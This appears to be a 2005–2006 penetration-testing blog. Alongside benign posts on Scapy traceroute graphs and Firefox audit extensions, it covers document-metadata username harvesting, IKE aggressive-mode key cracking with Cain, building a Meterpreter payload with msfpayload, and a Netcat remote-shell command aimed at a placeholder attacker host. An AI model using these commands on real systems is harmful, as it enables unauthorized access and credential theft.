Saturday, May 20, 2006

2D and 3D traceroute with Scapy

I was trying the scapy graphic traceroute features, and i liked both of them the 2D and the new 3D traceroute output.

Let's do a basic traceroute:

>>> mytrace,err = traceroute (["www.google.com"])

And the classic output is this:

>>> mytrace.show()
216.239.51.99:tcp80
1 192.168.1.1 11
2 87.219.30.1 11
3 10.255.136.254 11
4 10.255.228.1 11
5 10.255.228.2 11
6 208.175.154.177 11
7 195.2.10.122 11
8 195.2.10.129 11
9 195.66.226.125 11
10 72.14.238.253 11
11 66.249.95.146 11
12 216.239.49.34 11
13 66.249.94.235 11
14 72.14.238.232 11
15 72.14.238.97 11
16 66.249.95.149 11
17 72.14.239.17 11
21 216.239.51.99 SA
23 216.239.51.99 SA
24 216.239.51.99 SA
26 216.239.51.99 SA
29 216.239.51.99 SA

Now if we want to create a 2D image of the results we just do this:

>>> mytrace.graph(target=">mytrace.svg")



Better for understanding ;)

And for last the 3D output:

>>> mytrace.trace3D()




Cool! if you right click on any host, scapy will scan for port 80,22,21,23,25 and 443.

I think it's more useful the 2D output, but the 3D is so cool...

You can download scapy, from http://www.secdev.org
By - No comments:

Thursday, May 11, 2006

Extracting Deep Information

I was looking for a way, to get more information about my targets, something that could be useful
in a penetration test, one thing that is valuable are valid user accounts. So how can i have more
potential accounts? one way is harvesting email addresses from the search engines, this is old i wanted more; another way is to extract metadata from public documents of the target.

How can i accomplish that? Basically extracting MetaData information from the documents.

Metadata is literally "data about data", are information about another set of data. [wikipedia]
For example in the metadata we can found the Author Name, the software used with the document, who made the last change and even you can get the MAC address of the machine where the document was created.

Great, what we really want are usernames so the most valuable field is Author, so i thinked Why don't we use the power of google to find what public documents a company has, download them and extract the information we need?

To extract metadata i'm using the GNU libextractor it support
a lot of file formats. And recently I came across wvware it's used for access to Microsoft Word files, the difference is that with wv we can access to version control information, like the document that Michal Zalewski wrote about finding "recorded changes ranging from very minor (spelling, changed dates, slight reformatting, rewording to avoid being sued)", he did all the test on the Microsoft Website. lcamtuf-strikeout.

If you have any other idea please write me a lines to discuss the topic

That's all stay tuned.. :)
By - No comments:

Wednesday, October 26, 2005

Using Meterpreter as a standalone utility

Post-exploitation techniques are a cool topic, these days i read a thread in Metasploit Mailing list
about using Meterpreter payload as a standalone utility, for example after exploiting sql injection you can upload meterpreter and work through it. Well here is some fast example on how to achieve this.

To create the meterpreter server:

$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.

After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 RHOST= E

I haven't time to test it but i think it works.

This is great for windows, if the target system is a Unix you could rely on S.E.L.F (Shellcode Elf Loader, another focus for the same objective "post-exploitation", i recommend to take a look at S.E.L.F. Phrack article.
By - No comments:

Sunday, October 2, 2005

Mozilla Firefox extensions for the pentester

Here i will list some of the most useful extensions for doing applications audits or pentest using Mozilla Firefox:

LiveHTTPheaders:

* Letting you edit request headers and replay an URL. Look for the Replay button in the live window! Very useful ;)
http://livehttpheaders.mozdev.org/

Web Developer Tools:
* Excellent tool, that let you do a lot of things, a must have. It turns the browser into a complete development Tool.
https://addons.mozilla.org/extensions/moreinfo.php?id=60

Switch Proxy Tools:
* This extension allows you to define a list of proxies and switch on the fly with a button, very fast! Tor, Paros, Burp, webscarab, jap.
https://addons.mozilla.org/extensions/moreinfo.php?id=125

Tamper Data:
* Use tamperdata to view and modify HTTP/HTTPS headers and post parameters. Trace and time http response/requests.
https://addons.mozilla.org/firefox/966/


Spiderzilla:
* A front end for httrack, you could create website mirrors from the browser.
https://addons.mozilla.org/addon.php?id=1616

Slogger:
* Slogger creates a complete log of your browsing history. It can save every page using the same options as the "Save Page As" command as well as saving a customizable plain text history file
https://addons.mozilla.org/extensions/moreinfo.php?id=143

Add n Edit Cookies:
*Cookie Editor that allows you add and edit "session" and saved cookies.
https://addons.mozilla.org/firefox/573/


If you got another interesting plugin, please share ;)
By - No comments:

Friday, May 27, 2005

ModSecurity: Application Firewall

I wrote an article about Modsecurity, an apache module that work as an application Firewall. The paper is written in Spanish because the lack of spanish documentation about it. I wrote it for a monthly publication for the company i work.

You can get it at:
HTML Version: http://www.isecauditors.com/es/iseclab4.html
PDF Version: http://www.isecauditors.com/downloads/artic/iseclab4.pdf

Enjoy
By - No comments:

Thursday, May 12, 2005

Ike Aggressive Mode Cracking

If you are doing a Pentest and you find a Vpn server there is a chance that it support Aggressive Mode, so what could we do?

1-Use Ikeprobe to check if the server support Aggressive Mode: ikeprobe ipserver
2-If we are lucky and there is a match, then we have to configure a vpn client (Safenet for example) with the information we have, we doesnt have the pre-shared key but doesnt matter, that is what we looking for.
3-Before firing up the vpn client, we have to put Cain to sniff the network traffic.
4-After the failed attempt Cain will have a sniffed the preshared key hash, now we send it to the Cain cracker.
5-And then we can launch Dictionary attack and if it fails, we can try brute force attack. We have to wait and wait... until the password is revealed.

That's all
By - No comments:

Netcat Udp shell

Here is a little memory helper about the uses of Netcat, an udp shell.

On the attacker:
Terminal 1: nc -lun -p 4444
Terminal 2: nc -lun -p 5555

On the Victim:
echo""|nc -un ipattacker 4444 | nc -un ipattacker 5555

So you type the commands on the Terminal 1 and you receive the output on Terminal 2.
This also apply to tcp
By - No comments:
Subscribe to: Posts (Atom)

Wfuzz 2.2.0 released

I'm pleased to announce a new version of WFuzz! Wfuzz has been created to facilitate the task in web applications assessments and it...

  • Wfuzz 2.1 released !
    I'm pleased to announce  a new version of WFuzz! Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for findi...
  • Scan for shellshock with wfuzz
    In the last few weeks everyone has been talking about Shellshock, the vulnerability affecting bash and having security ramifications everyw...
  • Wfuzz 2.2.0 released
    I'm pleased to announce a new version of WFuzz! Wfuzz has been created to facilitate the task in web applications assessments and it...